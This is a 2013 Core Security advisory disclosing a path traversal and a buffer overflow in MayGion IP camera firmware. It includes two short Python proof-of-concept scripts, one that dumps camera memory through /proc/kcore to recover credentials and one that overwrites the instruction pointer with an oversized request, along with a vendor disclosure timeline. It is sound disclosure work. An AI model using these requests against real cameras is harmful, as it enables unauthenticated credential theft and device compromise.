MayGion IP Cameras Firmware 09.27 – Multiple Vulnerabilities

  • 作者: Core Security
    日期: 2013-05-29
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    MayGion IP Cameras multiple vulnerabilities
    
    1. *Advisory Information*
    
    Title: MayGion IP Cameras multiple vulnerabilities
    Advisory ID: CORE-2013-0322
    Advisory URL:
    http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities
    Date published: 2013-05-28
    Date of last update: 2013-05-28
    Vendors contacted: MayGion
    Release mode: Coordinated release
    
    2. *Vulnerability Information*
    
    Class: Path traversal [CWE-22], Buffer overflow [CWE-119]
    Impact: Code execution, Security bypass
    Remotely Exploitable: Yes
    Locally Exploitable: No
    CVE Name: CVE-2013-1604, CVE-2013-1605
    
    3. *Vulnerability Description*
    
    Multiple vulnerabilities have been found in MayGion IP cameras [1] based
    on firmware v09.27 and below, that could allow an unauthenticated remote
    attacker:
    
     1. [CVE-2013-1604] to dump the camera's memory and retrieve user
    credentials,
     2. [CVE-2013-1605] to execute arbitrary code.
    
    4. *Vulnerable Packages*
    
     . MayGion IP cameras based on firmware 2011.27.09.
     . Other firmware versions are probably affected too but they were not
    checked.
    
    5. *Non-Vulnerable Packages*
    
     . H.264 ipcam firmware 2013.04.22.
    
    6. *Credits*
    
    These vulnerabilities were discovered and researched by Nahuel Riva and
    Francisco Falcon from Core Exploit Writers Team.
    
    7. *Technical Description / Proof of Concept Code*
    
    7.1. *User Credentials Leaked via Path Traversal*
    
    [CVE-2013-1604] The following Python code exploits a path traversal and
    dumps the camera's memory. Valid user credentials can be extracted from
    this memory dump by an unauthenticated remote attacker.
    
    /-----
    import httplib
    
    conn = httplib.HTTPConnection("192.168.100.1")
    conn.request("GET", "/../../../../../../../../../proc/kcore")
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    -----/
    
    7.2. *Buffer overflow*
    
    [CVE-2013-1605] The following Python script can be used to trigger the
    vulnerability without authentication. As a result, the Instruction
    Pointer register (IP) will be overwritten with 0x61616161, which is a
    typical buffer overrun condition.
    
    /-----
    import httplib
    
    conn = httplib.HTTPConnection("192.168.100.1")
    conn.request("GET", "/" + "A" * 3000 + ".html")
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    -----/
    
    8. *Report Timeline*
    
    . 2013-05-02:
    Core Security Technologies notifies MayGion of the vulnerabilities.
    Publication date is set for May 29th, 2013.
    
    . 2013-05-02:
    Vendor asks for a report with technical information.
    
    . 2013-05-03:
    A draft advisory containing technical details sent to MayGion team.
    
    . 2013-05-03:
    Vendor notifies that all vulnerabilities were fixed in the last firmware
    version, released April 22nd, 2013.
    
    . 2013-05-09:
    Core asks for a list of affected devices and firmware. No reply received.
    
    . 2013-05-28:
    Advisory CORE-2013-0322 is published.
    
    9. *References*
    
    [1] http://www.maygion.com
    
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